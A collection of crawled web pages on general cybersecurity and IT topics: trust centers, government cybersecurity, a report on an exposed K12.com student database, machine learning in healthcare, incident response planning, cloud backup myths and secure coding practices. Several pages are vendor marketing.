full citizens in the realm of intellectual property and innovation. Anjali Vats is an associate professor of communication and African and African Diaspora studies and associate professor of law (by courtesy) at Boston College.
<urn:uuid:dde178a8-dd05-4275-b943-332f72c7d8b5>
CC-MAIN-2024-38
https://www.nextgov.com/ideas/2020/12/iconic-american-inventor-still-white-male-and-s-obstacle-race-and-gender-inclusion/170580/?oref=ng-next-story
2024-09-17T16:13:24Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651800.83/warc/CC-MAIN-20240917140525-20240917170525-00324.warc.gz
en
0.95072
1,443
3.21875
3
A trust center, also known as a trust portal, security portal, or trust page, is a centralized online resource that provides comprehensive information about an organization's security, privacy, and compliance practices. It serves as a single source of truth for customers, partners, and other stakeholders who want to understand how an organization handles sensitive data and manages its security posture. The primary purpose of a trust center is to demonstrate transparency and accountability. By offering a clear, accessible repository of information about security and privacy practices, organizations can address concerns proactively and build confidence among their users and potential customers. Trust centers provide answers to common questions about data protection, privacy policies, and security measures. This proactive approach can reduce the workload on customer support teams and demonstrate a commitment to open communication. For companies that handle sensitive data, a well-designed trust center can be a powerful differentiator in a competitive market. It showcases a commitment to security and privacy that can set an organization apart from less transparent competitors. Many industries are subject to strict regulatory requirements regarding data protection and privacy. A trust center can help demonstrate compliance with these regulations and provide necessary information to auditors and regulators. This section should provide a comprehensive overview of the technical and operational controls the organization has in place to protect data. Topics might include: - Encryption practices for data at rest and in transit - Access control mechanisms and authentication protocols - Network security measures, including firewalls and intrusion detection systems - Physical security protocols for data centers and office locations - Employee security training and awareness programs A clear, comprehensive explanation of how the organization collects, uses, and protects user data is crucial. This section should include: - Types of data collected and reasons for collection - How data is used and shared - User rights regarding their personal data - Cookie policies and tracking technologies used - Data retention periods and deletion practices Details about regulatory standards and industry certifications the organization adheres to are important for building trust. This might include: - Compliance with regulations like GDPR, CCPA, HIPAA, or PCI DSS - Industry certifications such as ISO 27001, SOC 2, or FedRAMP - Results of recent audits or assessments (where appropriate to share) - Ongoing compliance monitoring and management practices Information about how data is stored, processed, and deleted should be clearly explained. This section might cover: - Data classification and handling procedures - Data minimization practices - Procedures for securely disposing of data when it's no longer needed - Data localization practices and cross-border data transfers An overview of how the organization prepares for and responds to potential security incidents or data breaches is crucial for building confidence. This section could include: - Overview of the incident response team and their roles - Steps taken to detect and respond to security incidents - Communication protocols in the event of a breach - Post-incident review and improvement processes Information about how users can manage their own privacy settings and exercise their data rights is important. This section might cover: - How to access, correct, or delete personal data - Options for opting out of certain data collection or use practices - Tools and settings available for users to control their privacy - Process for submitting data subject access requests A section addressing common questions about security and privacy, as well as additional resources for users who want to learn more. This might include: - Answers to frequently asked security and privacy questions - Links to relevant policies and procedures - Glossary of key terms and concepts - Educational resources on best practices for personal data protection Clear channels for users to reach out with security or privacy questions or concerns, such as: - Dedicated email addresses for security and privacy inquiries - Contact forms for submitting questions or concerns - Information about the security and privacy teams The trust center should be easy to navigate, with clear headings and a logical structure. Use plain language and avoid technical jargon where possible. Consider providing multiple formats (e.g., text, infographics, videos) to cater to different learning styles. A trust center is not a static resource. It should be regularly updated to reflect changes in the organization's practices, new compliance achievements, or evolving security measures. Consider including a "What's New" section to highlight recent updates. Some organizations include real-time status updates about their systems and services, providing an additional layer of transparency. This could include information about ongoing incidents, planned maintenance, or system performance metrics. Consider the needs and concerns of your specific audience when designing your trust center. A B2B software company might need to provide more technical details than a consumer-focused retail business, for example. Make sure the trust center is easily accessible from your main website and is consistent with your overall brand and design guidelines. Consider linking to it from key pages like your homepage, product pages, and sign-up forms. Provide mechanisms for users to give feedback on the trust center itself. Use this feedback to continually improve the content and usability of the resource. While trust centers offer numerous benefits, there are also challenges to consider: Organizations must carefully consider what information to share publicly. While transparency is important, it's crucial not to disclose details that could compromise security. Maintaining an accurate and current trust center requires ongoing effort and coordination across multiple teams within an organization. Explaining complex security and privacy concepts in a way that's understandable to a general audience can be challenging. It requires a careful balance of detail and simplicity. A trust center is not a one-time project but an ongoing commitment to transparency and trust. Organizations must be prepared to invest resources in maintaining and evolving their trust center over time. As digital interactions continue to dominate both personal and professional spheres, the role of trust centers in establishing and maintaining digital trust is likely to become increasingly important. We may see developments such as: - Greater integration of real-time data and analytics - Use of AI to provide personalized trust information - Increased standardization of trust center formats across industries - Integration with emerging technologies like blockchain for verifiable trust claims A well-designed and maintained trust center is more than just a repository of security and privacy information. It's a powerful tool for building and maintaining trust in an era where data protection is a top concern for many users and businesses. By providing clear, comprehensive, and easily accessible information about their security and privacy practices, organizations can demonstrate their commitment to protecting user data, differentiate themselves in the market, and foster long-term relationships built on trust and transparency. Use HyperComply's Trust Page to store all your compliance information in one place demonstrate your organization's security posture to all prospects at once. Book a demo.
<urn:uuid:cb8756d7-ffeb-405a-8fe1-8c03d2b2bfa9>
CC-MAIN-2024-38
https://www.hypercomply.com/blog/what-is-a-trust-page
2024-09-18T22:28:35Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651941.8/warc/CC-MAIN-20240918201359-20240918231359-00224.warc.gz
en
0.91657
1,375
2.6875
3
Today, governments all around the world rely heavily on technology to carry out their daily operations. Everything is handled by IT, from applying for an ID to obtaining government benefits. As a result, any government is vulnerable to cybercrime risks such as data leaks and hacking. Here are some reasons why governments are concerned about cybersecurity: Cybersecurity safeguards national information. Governments around the world, like businesses, store sensitive data on computers and in the cloud. The information could be about national investments, defense plans, citizen identification, or other topics. Enemies or hackers may attempt to attack government systems in order to gain access to sensitive information. Assume an enemy country gains access to defense plans by hacking onto a government system. This will jeopardies the country’s overall security. As a result, cybersecurity is critical in protecting sensitive national information. Governments rely on cybersecurity to offer uninterrupted services. The majority of government services are accessible through websites. Every country has a slew of government-linked websites that keep the country functioning smoothly. Get a local government cybersecurity specialist to resolve your security issue. Attackers may attempt to compromise such important websites in order to disrupt national services. The entire country will grind to a halt, and official things will suffer. It could even have a detrimental impact on the economy. National infrastructure is protected by cybersecurity. To provide varied services, governments rely on a variety of hardware. The list of servers, computers, sensors, CPUs, and modems is limitless. Even basic services like energy and water must be provided by governments using IT infrastructure. A portion of the national infrastructure is also linked to the internet for data and information exchange. As you might expect, they’re all linked to technology and vulnerable to cyber attacks. Cyber security services can help national governments and even local governments prevent breaches and secure national infrastructure. To avoid cyberwar, cybersecurity is essential. Cyberwarfare is no longer the stuff of science fiction movies. Many countries, and even individuals, have employed digital warfare to wage war on governments all around the world. Estonia, Georgia, India, and even the United States are among the casualties. Enemies can hack into government systems in order to spy on military intelligence, disrupt critical services, or even cause infrastructure damage. Without effective cybersecurity procedures, governments will be unable to prevent cyberwar. It also aids in the protection of classified and top-secret data. What can the government do to strengthen national cybersecurity? Governments take the lead in enacting strong cybersecurity policies and legislation across the country. They take numerous efforts to ensure that enemies or hackers are unable to complete their dangerous missions. The following are some of the steps: - Increasing the number of cybersecurity professionals involved in government decision-making - Dedicated cybersecurity centers are being established. - Data centers are owned to avoid data breaches and snooping. - Increasing citizen and government employee awareness - Regular cybersecurity audits are conducted to identify security flaws. - Setting up phone numbers or websites to report cybercrime - Developing emergency crisis management plans - Appointing executives to oversee national cybersecurity initiatives - Staff and stakeholders are being educated on cybersecurity best practices. Governments also devise quick counter-cybercrime strategies based on the circumstances. Using failsafe encryption, for example, helps secure national data from espionage risks. Our federal, state, and municipal governments all rely on information technology to run their operations. Consider how much effort would be required to mail out social security checks without today’s computers’ power and speed. Consider the amount of time, effort, and labour required to file annual tax returns. And this is nothing compared to the numerous responsibilities that information technology plays in our administration. The Military and Information Technology The United States has the most formidable military force in the world for a reason, and that reason is that we have the best technology. The military can communicate swiftly and effectively anywhere in the world thanks to information technology. It also enables for speedy analysis and dissemination of data. Cutting-edge information technology also allows all branches of the military to more effectively design weapons and other trade equipment. IT also allows the military to maintain a constant eye on their adversaries. Government Information Technology at the State Level Information technology is one of the most significant aspects of the state’s infrastructure in California, for example, because it is one of the largest and most populous states. The state spends over a billion dollars per year on IT, and many of the state’s functions would be impossible to provide without it. The state’s IT department’s current responsibilities include assisting in the construction of highway systems, traffic regulation, and delivering virtually real-time background checks and criminal history data to local, county, and state police officers. Thousands of people in the state are employed by the IT industry. Information technology’s importance in storing and retrieving all types of documents cannot be overstated. Records may be retrieved in seconds, modified, saved, and stored again almost rapidly thanks to the latest storage techniques. Having current records with all of the necessary information can save millions of dollars each year. On the Local Government Level, Information Technology Local government IT is just as vital as federal and state government IT. Capital planning, accounting, payroll, inventory management, and many more disciplines also employ information technology. Most towns and cities now have their own websites where residents and tourists may find information on city services and seek assistance with specific requirements. What are the benefits of a national cybersecurity defense strategy? Governments all throughout the world have recognized the dangers that cybercrime poses to a country. They’ve realized that fighting cybercrime without a well-thought-out approach is impossible. As a result, over 100 countries have collaborated to develop national cybersecurity defense measures. A plan gives a country’s cybersecurity efforts and initiatives some structure. It establishes the benchmark that a government must meet or exceed in order to disarm hackers and attackers. Instead of pursuing reactionary actions, governments can get a plan to follow. A well-planned and studied approach can help a government become more proactive in combating cybercrime. The components of a cybersecurity protection strategy differ per country. All techniques, however, have a few characteristics in common: - A specialized national infrastructure protection program - A plan for dealing with calamities - Cybercrime legislation that works - To combat cyber dangers, a networked ecosystem is being built. As crucial as a national military strategy is a national cybersecurity strategy. It improves a country’s ability to defend itself and prevent cybercrime. The importance of information technology in all governments cannot be overstated, as many of the services they provide would not be possible without it. IT is now a fundamental element of government, and its significance will only grow in the future. Information technology is at the heart of all levels of government’s everyday activities, and if the IT infrastructure were to fail, such governments would grind to a halt, unable to function on nearly any level. One of the reasons IT security is such a significant and essential company today is because of this.
<urn:uuid:cb4800e8-806c-4bbe-9573-4e68de514e06>
CC-MAIN-2024-38
https://cybersguards.com/the-importance-of-cyber-technologies-in-government/
2024-09-20T04:56:45Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652130.6/warc/CC-MAIN-20240920022257-20240920052257-00124.warc.gz
en
0.93595
1,465
3.171875
3
A K12.com database containing almost 7 million student records was left open so that anyone with an internet connection could access it. On June 25, 2019, Comparitech and security researcher Bob Diachenko uncovered the exposure. The data leak involved a MongoDB instance that was made public. K12.com provides online education programs for students. This exposure affected its A+nyWhere Learning System (A+LS) which is used by more than 1,100 school districts. What information was exposed? The exposed database held almost 7 million (6,988,504) records containing students’ data. The information held within each record included: - Primary personal email address - Full name - School name - Authentication keys for accessing ALS accounts and presentations - Other internal data In this instance, an old version of MongoDB (2.6.4) was being utilized. This version of the database hasn’t been supported since October 2016. What’s more, the Remote Desktop Protocol (RDP) was enabled but not secured. As a result, the database was indexed by both the Shodan and BinaryEdge search engines. This means the records contained on the database were visible to the public. We discovered the indexed data on June 25 but it had been public since June 23 and the database wasn’t closed down until July 1. So, in all, the data leak lasted just over one week. It’s unclear whether or not any malicious parties accessed the data during the exposure. Diachenko was able to get in touch with K12 reps with the assistance of Dissent Doe, the administrator of Databreaches.net. K12 was very responsive and provided the following statement. “K12 takes data security very seriously. Whenever we are advised of a potential security issue, we investigate the problem immediately, and take the appropriate actions to remedy the situation.” Implications of exposed data While the leak of this information isn’t as bad as, for example, the exposure of financial data or Social Security numbers, it does have its implications. These pieces of information can be used to target individual students in spear phishing and account takeover fraud. Having their school name made public could potentially put students at risk of physical harm. If you or your child has used K12.com’s A+LS, be on the lookout for things like login attempts for various accounts and phishing emails. Having an email address made public may also result in an increase in volume of spam emails you receive. K12.com provides online learning programs to individuals and schools. It appears that this exposure only affected its A+LS software. Depending on the setup, this system can be accessed by students through a desktop client on home or school computers, or through the web both inside and outside of a school’s network. Personal information such as name, email address, and date of birth is required for each student to create an account. As far as we know, K12.com hasn’t been involved in any other data leaks in the past. However, this isn’t the first exposure affecting students in K-12 education and won’t be the last. Indeed, there were 122 K-12 cybersecurity incidents in 2018, involving 119 education agencies. As schools increasingly use technology, cybersecurity will continue to be a growing concern.
<urn:uuid:74643696-4bb8-4d9a-8bbc-3d1cec4dc241>
CC-MAIN-2024-38
https://www.comparitech.com/blog/vpn-privacy/report-7-million-student-records-exposed-by-k12-com/
2024-09-20T04:23:49Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652130.6/warc/CC-MAIN-20240920022257-20240920052257-00124.warc.gz
en
0.958637
702
2.59375
3
Imagine a future in which technology not only helps but completely changes how we provide patients healthcare. That’s precisely what machine learning in healthcare is doing, bringing us closer to a future in which predictive algorithms and data-driven insights improve every facet of medical care. Once-futuristic concepts are becoming a reality because of this ground-breaking technology, which is changing how medical professionals: - Treat, and - Manage patients’ health. The impact of machine learning in healthcare is not just theoretical, impressive statistics back it. - A study by Accenture projects that AI applications could save the U.S. healthcare industry $150 billion annually by 2026. - Furthermore, research from the National Institute of Health, reveals that machine-learning algorithms can detect breast cancer with accuracy levels comparable to human radiologists. As we dive into the intricate world of machine learning, it’s crucial to understand its growing influence on healthcare. Therefore, let’s embark on this journey to see how ML is shaping the future of medicine. Understanding Machine Learning in Healthcare Machine learning, a subset of artificial intelligence, involves training algorithms to recognize patterns and make decisions based on vast amounts of data. Unlike traditional programming, where explicit instructions are provided, machine learning models learn from data inputs to improve their performance over time. In healthcare, this ability to learn and adapt is particularly valuable, as it allows for the analysis of complex datasets. Thus, leading to more accurate diagnoses and personalized treatments. Therefore, the relevance of machine learning in healthcare cannot be overstated. It offers innovative solutions that are reshaping patient care, from predicting disease outbreaks to personalizing medicine. Moreover, the role of healthcare AI extends beyond diagnostics and treatment planning. It is enhancing medical practice by: - Streamlining administrative tasks, - Optimizing resource allocation, and - Even predicting patient admission rates. As a result, AI is driving a more efficient, patient-centered healthcare experience, promising better outcomes and improved quality of care. Key Applications of Machine Learning in Healthcare As machine learning continues to evolve, its applications in healthcare are becoming increasingly diverse and impactful. Let’s look at some ML healthcare applications. - Diagnosis and Prediction Machine learning in healthcare is changing diagnosis and prediction, offering unprecedented accuracy and speed in early disease detection. By analyzing vast amounts of data, ML algorithms can identify subtle patterns that may indicate the onset of diseases. For example, Google’s DeepMind has developed an algorithm capable of diagnosing eye diseases as accurately as leading experts, while IBM Watson is used to predict diabetes risk by analyzing electronic health records. - Personalized Medicine In addition to early detection, machine learning in healthcare is transforming personalized medicine by tailoring treatment plans to individual patient needs. Unlike traditional approaches that often rely on standardized protocols, ML models analyze a patient’s genetic makeup, lifestyle, and medical history to recommend specific drug treatments. For instance, companies like Tempus leverage machine learning to customize cancer treatment plans. Thus, ensuring patients receive the most effective therapies based on their unique profiles. - Medical Imaging Analysis Machine learning is also enhancing medical imaging analysis, leading to more accurate interpretations of MRI and CT scans. As we all know, traditional imaging techniques can be time-consuming and subject to human error. However, ML algorithms improve image resolution and highlight abnormalities that might be missed by the human eye. For example, Google’s AI has been shown to outperform radiologists in detecting lung cancer from CT scans. As a result, this increased accuracy not only assists radiologists but also accelerates diagnosis, facilitating quicker and more informed treatment decisions. - Patient Monitoring and Care Management Furthermore, machine learning in healthcare is pivotal in patient monitoring and care management, especially for chronic disease management. With the advent of wearable devices, real-time data collection has become a reality. Thus, allowing continuous monitoring of patient vitals such as heart rate, blood pressure, and glucose levels. For instance, companies like Fitbit and Apple Health are integrating machine learning algorithms into their devices to provide insights into patient health trends and predict potential issues before they escalate. Benefits of Machine Learning in Healthcare As we now know the key applications of machine learning in healthcare, it is time to look for its benefits: - Improved Accuracy and Efficiency One of the most significant benefits of machine learning in healthcare is the improvement in accuracy and efficiency. Machine learning algorithms can analyze complex datasets faster and more accurately than human counterparts. As a result, this reduces diagnostic errors and administrative burdens. For instance, ML systems can quickly sift through medical records to identify potential risk factors and recommend appropriate interventions. As a result, healthcare professionals can focus more on patient care rather than administrative tasks. - Enhanced Patient Outcomes Moreover, machine learning in healthcare has been shown to enhance patient outcomes by enabling more effective treatment strategies. By leveraging ML algorithms, healthcare providers can tailor treatment plans to individual patient needs, thereby improving the likelihood of successful outcomes. Numerous case studies illustrate how machine learning has improved treatment effectiveness, particularly in oncology. Consequently, patients benefit from more targeted and efficient care, reducing recovery times and improving overall health outcomes. - Cost Reduction Furthermore, machine learning can significantly reduce healthcare costs by optimizing resource use. By predicting patient needs and streamlining operations, ML systems help healthcare providers allocate resources more efficiently, leading to cost savings. For example, predictive analytics can anticipate patient admission rates, enabling hospitals to optimize staffing and inventory management. Additionally, by reducing diagnostic errors and minimizing unnecessary tests, machine learning in healthcare lowers costs associated with misdiagnoses and redundant procedures. Challenges and Limitations Despite all the benefits of machine learning in healthcare, it has some challenges. Here are some of them: - Data Privacy and Security One of the primary challenges facing machine learning in healthcare is data privacy and security. As ML algorithms rely on vast amounts of patient data to generate insights, certifying the protection of this sensitive information is paramount. Furthermore, concerns regarding patient data protection have intensified, particularly with the increasing number of cyberattacks targeting healthcare systems. Additionally, regulatory requirements such as HIPAA in the United States impose strict guidelines on data handling and privacy. - Integration with Existing Systems Another significant challenge is integrating machine learning solutions into existing healthcare infrastructure. Many healthcare systems rely on outdated technologies and legacy systems. Thus, making it difficult to incorporate advanced ML models seamlessly. Additionally, compatibility issues and a lack of standardized data formats often hinder the successful implementation of machine learning in healthcare settings. As a result, healthcare organizations must invest in upgrading their IT infrastructure and training personnel to manage and integrate these advanced technologies. - Bias and Fairness Bias and fairness also present critical challenges in deploying machine learning in healthcare. ML models are only as good as the data they are trained on; thus, biased or unrepresentative datasets can lead to skewed predictions. Addressing potential biases in ML models is essential to ensure equitable healthcare outcomes for all patients, regardless of their background or demographic characteristics. To mitigate these issues, developers and healthcare providers must implement rigorous testing and validation processes. How advansappz Helps You Navigate the Challenges In the rapidly evolving landscape of healthcare technology, advansappz stands out as a trusted partner in helping organizations harness the full potential of machine learning. As an innovative IT company, advansappz specializes in providing comprehensive solutions tailored to the unique needs of the healthcare industry. - Ensuring Data Privacy and Security advansappz places a strong emphasis on data privacy and cybersecurity, recognizing the critical importance of protecting sensitive patient information. By implementing state-of-the-art security protocols and encryption technologies, advansappz ensures that your data is safeguarded against unauthorized access and cyber threats. Moreover, our team of experts is well-versed in regulatory compliance, helping healthcare providers navigate complex regulations such as HIPAA. Consequently, you can trust advansappz to deliver machine-learning solutions that prioritize data protection and maintain patient confidentiality. - Seamless Integration with Existing Systems One of the key strengths of advansappz is our ability to integrate machine learning solutions seamlessly into your existing healthcare infrastructure. We understand that compatibility issues can pose significant challenges, which is why we offer customized integration services. Our team works closely with your IT staff to ensure smooth implementation and minimal disruption to your operations. As a result, you can leverage the power of machine learning in healthcare without the headaches associated with system integration. - Addressing Bias and Ensuring Fairness advansappz is committed to promoting fairness and transparency in machine learning applications. We employ advanced techniques to detect and mitigate biases in ML models. Thus, ensuring that all patients receive equitable treatment recommendations. Moreover, our rigorous testing and validation processes help identify potential biases, allowing us to refine algorithms and improve their accuracy. Therefore, by partnering with advansappz, you can trust that your machine-learning initiatives will be ethical, fair, and aligned with the highest standards of patient care. Machine learning in healthcare is revolutionizing the way medical professionals diagnose, treat, and manage patient care. It is offering a future where precision and personalization are at the forefront. From improving accuracy in diagnostics to enabling personalized treatment plans, the benefits of machine learning are profound and far-reaching. However, the journey to fully integrating these technologies into healthcare systems comes with its share of challenges, including data privacy concerns, integration issues, and potential biases in algorithms. Organizations like advansappz play a crucial role in helping healthcare providers navigate these challenges. advansappz empowers healthcare organizations to harness the full potential of these technologies. Contact advansappz to learn more. 1. What are the main types of machine learning algorithms used in healthcare? Machine learning in healthcare utilizes various algorithms, including supervised learning for disease prediction, unsupervised learning for patient clustering, and reinforcement learning for personalized treatment plans. 2. How can machine learning improve patient-doctor interactions? Machine learning in healthcare can enhance patient-doctor interactions by providing doctors with data-driven insights and recommendations. As a result, this allows physicians to make more informed decisions. 3. What role does machine learning play in drug discovery? Machine learning in healthcare accelerates drug discovery by analyzing vast datasets to identify potential drug candidates and predict their effectiveness. Moreover, by reducing the time and cost associated with traditional drug development processes, ML helps bring new treatments to market more quickly. 4. How does machine learning address the shortage of healthcare professionals? Machine learning in healthcare helps address the shortage of healthcare professionals by automating routine tasks, optimizing workflow efficiency, and enabling remote patient monitoring. 5. What are the future trends of machine learning in healthcare? The future of machine learning in healthcare includes advancements in predictive analytics, real-time data integration, and the development of AI-driven diagnostic tools. As these technologies evolve, they promise to further improve patient outcomes and transform healthcare delivery.
<urn:uuid:4c740544-1cfe-450d-b517-07e5fd84cee5>
CC-MAIN-2024-38
https://advansappz.com/machine-learning-in-healthcare-revolutionizing-patient-care/
2024-09-10T10:08:36Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651241.17/warc/CC-MAIN-20240910093422-20240910123422-00124.warc.gz
en
0.928507
2,260
3.078125
3
A Cyber Incident Response (IR) plan is the organized approach that an organization takes to both address and manage the repercussions of a cyberattack or incident. This type of attack could refer to any event that could lead to disruption or a loss of an organization’s services, functions, or operations. Essentially, it’s the process of detecting a cyber attack, then taking the proper steps to evaluate and clean up what has happened. The overarching goal of an IR plan is to reduce damage and recovery time. When it comes to cybersecurity and an IR plan, it’s all about planning ahead and having a plan of attack before it is actually necessary. Rather than being an IT-centric process, IR is an overall business function that helps ensure your organization can make quick decisions based on dependable information. Oftentimes, IT security staff is involved, as well as representatives from other core areas of the organization, such as HR and Comms. So, let’s take a deeper look at Cyber Incident Response. In this 3-part blog series, we’ll take a deep dive into IR and cover: • Cyber IR: Why you need it • Building your IR team • Creating an IR Plan By the time we get to the last blog, you’ll have learned some actionable IR strategies! Learn more about IR and how DomainTools can help keep your information safe:
<urn:uuid:9353cfb6-a265-4c6e-a604-1a39f8af5001>
CC-MAIN-2024-38
https://www.domaintools.com/resources/blog/what-is-a-cyber-incident-response-plan/
2024-09-10T11:11:10Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651241.17/warc/CC-MAIN-20240910093422-20240910123422-00124.warc.gz
en
0.954319
290
2.671875
3
Organizations worldwide are making the move to the cloud, and that means more of their data lives there than ever before. Yet, many of these businesses pursue the cloud with misconceptions around their data protection needs. Let’s look at some of those myths: Many organizations believe that the cloud is inherently safe and as a result there is no need to implement effective data backup and recovery. But, cloud data security is a shared responsibility between the cloud provider and the customer. The responsibility of the cloud provider is to safeguard the infrastructure, ensure access, and configure physical hosts, storage and other resources. In short: to ensure the underlying infrastructure is available. The responsibilities of the customer are to manage users and their access privileges, safeguard cloud accounts from unauthorized access, encryption and protection of cloud-based data assets, and managing compliance1. As a result, it is up to the customer to ensure an effective backup and recovery solution is in place to ensure the data itself is available. Otherwise, cloud data can be subject to malicious threats as well as unintentional deletions, impacting key workloads across the IT environment. 1. “Shared Responsibility Model Explained.” Cloud Security Alliance, 26 Aug. 2020, https://cloudsecurityalliance.org/blog/2020/08/26/shared-responsibility-model-explained. Cloud providers have developed native tools for basic retention or backup functions. However, adoption of and reliance upon these solutions can create several challenges. First of all, these often have default retention periods (e.g. 30 days for M365) that fall far short of enterprise requirements. They also can be complex to use when modifying defaults—and typical recovery times may fall short of SLA requirements, particularly at scale. These native services are also siloed—in the sense that they are not designed to also protect data sources beyond those they host, i.e. those running on-premises or in other clouds. As a result, organizations often end up with multiple systems to manage when using such tools, which drives up complexity and costs, creates a broader attack surface for security risks and breaches and poses challenges in meeting business SLAs and compliance requirements. Many believe that recovery of cloud data is quick and seamless. Yet, what many have come to realize is that both backup and recovery speed in the cloud is highly network dependent. As a result, there is no guarantee that there won’t be any lags or latency in data recovery, which can have a significant impact for businesses with tight Recovery Time Objectives (RTOs). This is why a hybrid solution that can be managed from one place and that provides both self-managed and SaaS options is paramount. This way, you can choose where cloud backup data resides in order to meet SLA expectations properly when it comes to restores. Having that solution also be optimized for network performance, transmitting only delta change blocks across the WAN is also important. Backup remains critical to business operations, and organizations need to be aware of their responsibilities when storing data in the cloud. To solve for many of these challenges, Cohesity offers a choice of consumption models for data backup and recovery. With Cohesity DataProtect organizations can take advantage of an on-premises backup solution which is self-managed and as Backup as a Service (BaaS) which can extend to cloud-native and SaaS workloads. With Cohesity DataProtect delivered as a service, organizations can simplify backup with a service that’s optimized for a true hybrid experience from datacenter to cloud to edge environments, all while using a simple, unified UI and capacity-based pricing. As you can see, we’ve got you covered when it comes to protecting your cloud data sources.
<urn:uuid:3e277289-d0c1-4447-b378-d6a80bc20e82>
CC-MAIN-2024-38
https://www.cohesity.com/dm/tip-sheets/top-3-myths-about-backing-up-cloud-native-and-saas-data/
2024-09-12T18:39:13Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651491.39/warc/CC-MAIN-20240912174615-20240912204615-00824.warc.gz
en
0.949571
773
2.6875
3
With software being central to today’s interconnected world, making it secure has become more crucial than ever. Fortunately, decreasing cyber risks and achieving more secure applications is well within the reach for any company developing software out there – they should simply write the code with security in mind. To grasp the concept of secure coding, let’s first explore what source code is all about. Source code consists of instructions that determine how an application should work, behave and operate. It serves as the foundational blueprint, detailing operational procedures and responses to various inputs. Initially written in a human-readable form – that we call programming language –, the source code is translated into machine-readable instructions, the binary code that computers understand and execute. Secure coding is about writing the source code in a way to protect applications from vulnerabilities and potential threats. This includes using specific coding techniques and adhering to coding best practices to mitigate security risks, safeguard against data breaches, prevent unauthorized access, or make malicious code execution hard. This includes both writing the source code securely and maintaining any third-party libraries in a secure state. Simply put, the goal is to have an application that does well what it should do, but that doesn’t do anything that it shouldn’t. By prioritizing secure coding principles, developers aim to create applications that are resilient and robust against malicious attacks. This proactive approach ensures optimal performance without compromising sensitive data or exposing vulnerabilities. Indeed, these weaknesses can lead to substantial reputational risks and financial losses, sometimes reaching millions, as evidenced in notable cases like Heartbleed, Log4Shell, or the Microsoft Exchange breach. Security incidents often originate within an application’s software and codebase, underscoring the critical need for robust secure coding practices to establish a solid foundation for software security. To effectively adopt secure programming, developers should adhere to coding best practices. Here are some key basic practices that should be implemented. Implement robust authentication and authorization mechanisms alongside standard encryption algorithms to protect data in transit and at rest. Don’t hardcode sensitive information such as passwords or access keys directly into your code or the code repository, even if you use available tools for secrets management in your applications. Obviously, you cannot prepare your code to work well for all possible inputs. At the same time, inputs are the ultimate channels through which the attackers will feed in something unexpected that your code is not prepared for. And that’s exactly where input validation comes into picture: just reject anything your code may misbehave for and accept only those values you are sure your code is OK with. And remember, the default behavior is to reject; so always apply allowlists for input validation, do not use denylists. Third party components and libraries – regardless of being commercial tools or open-source – can save time but are also common entry points for vulnerabilities. If you have a vulnerability in these, it is not your fault, but is still your problem! Avoid using components with known vulnerabilities, which means keeping your dependencies up to date all the time and continuous monitoring of sources of information for new vulnerabilities literally popping up on a daily basis. Combining regular secure code reviews and automated scanning tools can prevent many types of attacks, like Cross-site scripting (XSS) and SQL injection, just to name a few (XSS runs malicious code under your domain, while SQL injection steals or manipulates your internal data). Detecting the usage of vulnerable components is also a step you can easily automate these days. There are of course some types of vulnerabilities these tools cannot find; but the burden of the problems are of nature they can find and pin-point for you! Integrating secure coding practices across the Software Development Life Cycle (SDLC) is crucial to effectively address vulnerabilities. By embracing a “shift left” approach, some of the security-relevant activities are moved from later stages to the beginning of the SDLC. This ensures that security measures are implemented from initial requirements gathering and coding through testing, deployment, and ongoing maintenance. Remember: the earlier you realize a problem, the cheaper it is to fix it! Most importantly, securing your applications should start with fostering a robust security culture within the organization. This involves educating developers, IT teams, management, and all stakeholders on best practices and proactive threat management. Many SDLC schemes, like Microsoft’s Security Development Lifecycle (SDL) or SAMM also recognize this. Bottom line is: train your developers to fix the (in)security of your application at its core – the developers mindset! Security testing involves identifying and fixing potential vulnerabilities in your code before they get to production. It’s not about how the system should work – that’s functional testing. It’s about how the system should NOT work. Security testing can be done manually, using automated tools, but the best approach is to blend the two approaches. A secure development framework ensures that code is developed, tested, and deployed in a way that minimizes the risk of introducing vulnerabilities. It includes secure infrastructure, tools, and practices that collectively enhance the overall security of the whole software development lifecycle. OWASP secure coding refers to a collection of best practices, guidelines and cheat-sheets provided by the Open Worldwide Application Security Project. These sources outline general software security principles and specific coding requirements to help developers write secure code. OWASP is not just the Top Ten after all! Yes, there are many. Some guidelines are created for specific programming languages, like SEI CERT C, C++ or Java secure coding guidelines. Yet some others are created for specific lines of business, like MISRA for automotive and transportation, or PCI DSS for banking and financial services. And, there are some databases of vulnerabilities from which one can also learn a lot, like the Common Weakness Enumeration (CWE) or the Fortify Taxonomy. Secure coding protects businesses from financial losses, reputational damages, and legal consequences by preventing data breaches and other security incidents. It helps maintain customer trust and at the same time ensures compliance with regulatory requirements. In conclusion, incorporating secure coding practices is essential for any organization developing applications in order to mitigate risks and protect software from cyber threats. By implementing these key practices, developers establish a robust foundation to ensure the integrity of applications throughout their lifecycle. Cydrill’s award-winning training program offers a blended learning journey for software engineers to ensure they are well-prepared for secure coding. With its gamified environment and content, Cydrill empowers developers to take the lead in securing our digital future.
<urn:uuid:af73fc61-a734-4107-a94b-2f8d7f3b2e52>
CC-MAIN-2024-38
https://cydrill.com/audience_tags_post/managers/
2024-09-16T12:42:13Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651697.32/warc/CC-MAIN-20240916112213-20240916142213-00524.warc.gz
en
0.921988
1,353
3.171875
3
